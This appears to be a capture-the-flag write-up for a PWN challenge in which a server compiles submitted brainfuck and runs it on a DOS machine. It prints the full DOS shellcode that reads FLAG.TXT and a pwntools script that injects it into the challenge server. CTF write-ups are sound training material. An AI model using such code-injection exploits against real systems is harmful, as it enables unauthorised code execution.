Points:\u00a0150
\nCategory: PWN<\/p>\n
You are still trying to get code execution on your own? Hahaha.<\/p>\n
There is an app for that!<\/p>\n
We are now introducing Remote Code Execution as a Service (RCEaaS)<\/strong>.<\/p>\n
Pro tips:<\/p>\n
\n
+[--->++<]>.++++[->++++<]>+.++++++++++.----------.+++++++++++.[---->+<]>+++.-[--->++<]>--.++++++++++++..----.[-->+<]>++.-----------..[--->+<]>+++.[--->+<]>.--------.[->+++++<]>--.+[--->+<]>++++.++++++.[--->+<]>-----.---[->++<]>.++[--->++<]>+.>++++++++++.<\/code><\/li>\n- Flag is at
A:\\FLAG.TXT<\/code><\/li>\n- No keyboard input in the Freemium version :\/<\/li>\n<\/ul>\n
nc 130.211.155.146 20666<\/pre>\ndownload<\/a><\/p><\/blockquote>\n
tl;dr<\/h2>\n
The server reads the input, compiles it as a brainfuck program (we are provided with the source code of the compiler used), spawns new DOS machine and executes the program on it. The flag is on the same spawned machine our program is running on. The solution is to inject DOS shellcode into executed code.<\/p>\n
Solution<\/h2>\n
I started with inspecting the memory content around the initial BC register searching for the code of provided program. After comparing the outputs of commands:<\/p>\n
$ python -c \"print '<.' * 1000\" | nc 130.211.155.146 20666 > tmp\r\n$ python -c \"print '<.' * 1000\" | python3 bfc.py >out.asm && nasm -f bin -o out.com out.asm\r\n<\/pre>\nI’ve confirmed\u00a0where the code is stored. As the code can contain\u00a0jumps (‘[]’) it is easy to inject shellcode by moving tho the code over some jump and overwriting the jump address. The remaining part was to construct the shellcode which would read a flag under DOS. After some googling I found:<\/p>\n
\n
- http:\/\/spike.scu.edu.au\/~barry\/interrupts.html<\/a><\/li>\n
- http:\/\/devdocs.inightmare.org\/tutorials\/x86-assembly-dos-file-inputoutput.html<\/a><\/li>\n<\/ul>\n
And constructed shellcode:<\/p>\n
; FLAG.TXT\r\nmov [bp], word 0x4c46\r\nmov [bp+2], word 0x4741\r\nmov [bp+4], word 0x542e\r\nmov [bp+6], word 0x5458\r\nmov [bp+8], word 0\r\n\r\n; open file\r\nmov ah, 3Dh\r\nmov dx, bp\r\nint 21h\r\n\r\n; read flag\r\nmov bx, ax\r\nmov ah, 3fh\r\nmov cx, 60 ; number of bytes to read\r\nmov dx, bp ; were to put read data\r\nint 21h\r\n\r\n; print flag\r\nmov cl, byte 60\r\nl1:\r\n cmp cl, 0\r\n je l2\r\n mov dx, [bp] ; flag char\r\n inc bp\r\n dec cl\r\n mov ah,02\r\n int 21h\r\n jmp l1\r\nl2:<\/pre>\nThe working solution code in python connecting and read sending encoded shellcode:<\/p>\n
from pwn import *\r\n\r\nSC = '\\xc7F\\x00FL\\xc7F\\x02AG\\xc7F\\x04.T\\xc7F\\x06XT\\xc7F\\x08\\x00\\x00\\xb4=\\x89' \\\r\n '\\xea\\xcd!\\x89\\xc3\\xb4?\\xb9<\\x00\\x89\\xea\\xcd!\\xb1<\\x80\\xf9\\x00t\\x0c\\x8b' \\\r\n 'V\\x00E\\xfe\\xc9\\xb4\\x02\\xcd!\\xeb\\xef'\r\n\r\ndef to_bf(c):\r\n return '+' * ord(c) + '>'\r\n\r\nBF = ''.join(to_bf(c) for c in SC)\r\n\r\ncmd = '<' * 9 + '[-]' + '+' * 8 + '>' * 9 + BF + '[]'\r\n\r\n\r\nwith remote('130.211.155.146', 20666) as conn:\r\n conn.sendline(cmd)\r\n conn.recvuntil('Installed at PS\/2 port', timeout=200)\r\n conn.recvuntil('loaded consuming 13520 bytes.', timeout=10)\r\n\r\n data = repr(conn.recvuntil(('A:\\\\>', 'Illegal Instruction occurred'), timeout=10)).strip('\"\\'')\r\n tail = repr(conn.recvall(timeout=3))\r\n data = re.sub('(\\[(\\??\\d+(;\\d+)?)?[A-Za-z])|(\\\\\\\\x1b)|(\\\\(B)|(\\\\\\\\r)', '', data)\r\n tail = re.sub('(\\[(\\??\\d+(;\\d+)?)?[A-Za-z])|(\\\\\\\\x1b)|(\\\\(B)|(\\\\\\\\r)', '', tail)\r\n\r\nprint data\r\nprint tail<\/pre>\n<\/p>\n","protected":false},"excerpt":{"rendered":"
Points:\u00a0150 Category: PWN Description You are still trying to get code execution on your own? Hahaha. There is an app for that! We are now introducing Remote Code Execution as a Service (RCEaaS). Pro tips: +[—>++<]>.++++[->++++<]>+.++++++++++.———-.+++++++++++.[—->+<]>+++.-[—>++<]>–.++++++++++++..—-.[–>+<]>++.———–..[—>+<]>+++.[—>+<]>.——–.[->+++++<]>–.+[—>+<]>++++.++++++.[—>+<]>—–.—[->++<]>.++[—>++<]>+.>++++++++++. Flag is at A:\\FLAG.TXT…<\/span> <\/p>\n
Read more ›<\/div>\n<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,11],"tags":[7],"yoast_head":"\n\n\n\n\n\n\n\n\n\n\n\n\n\t\n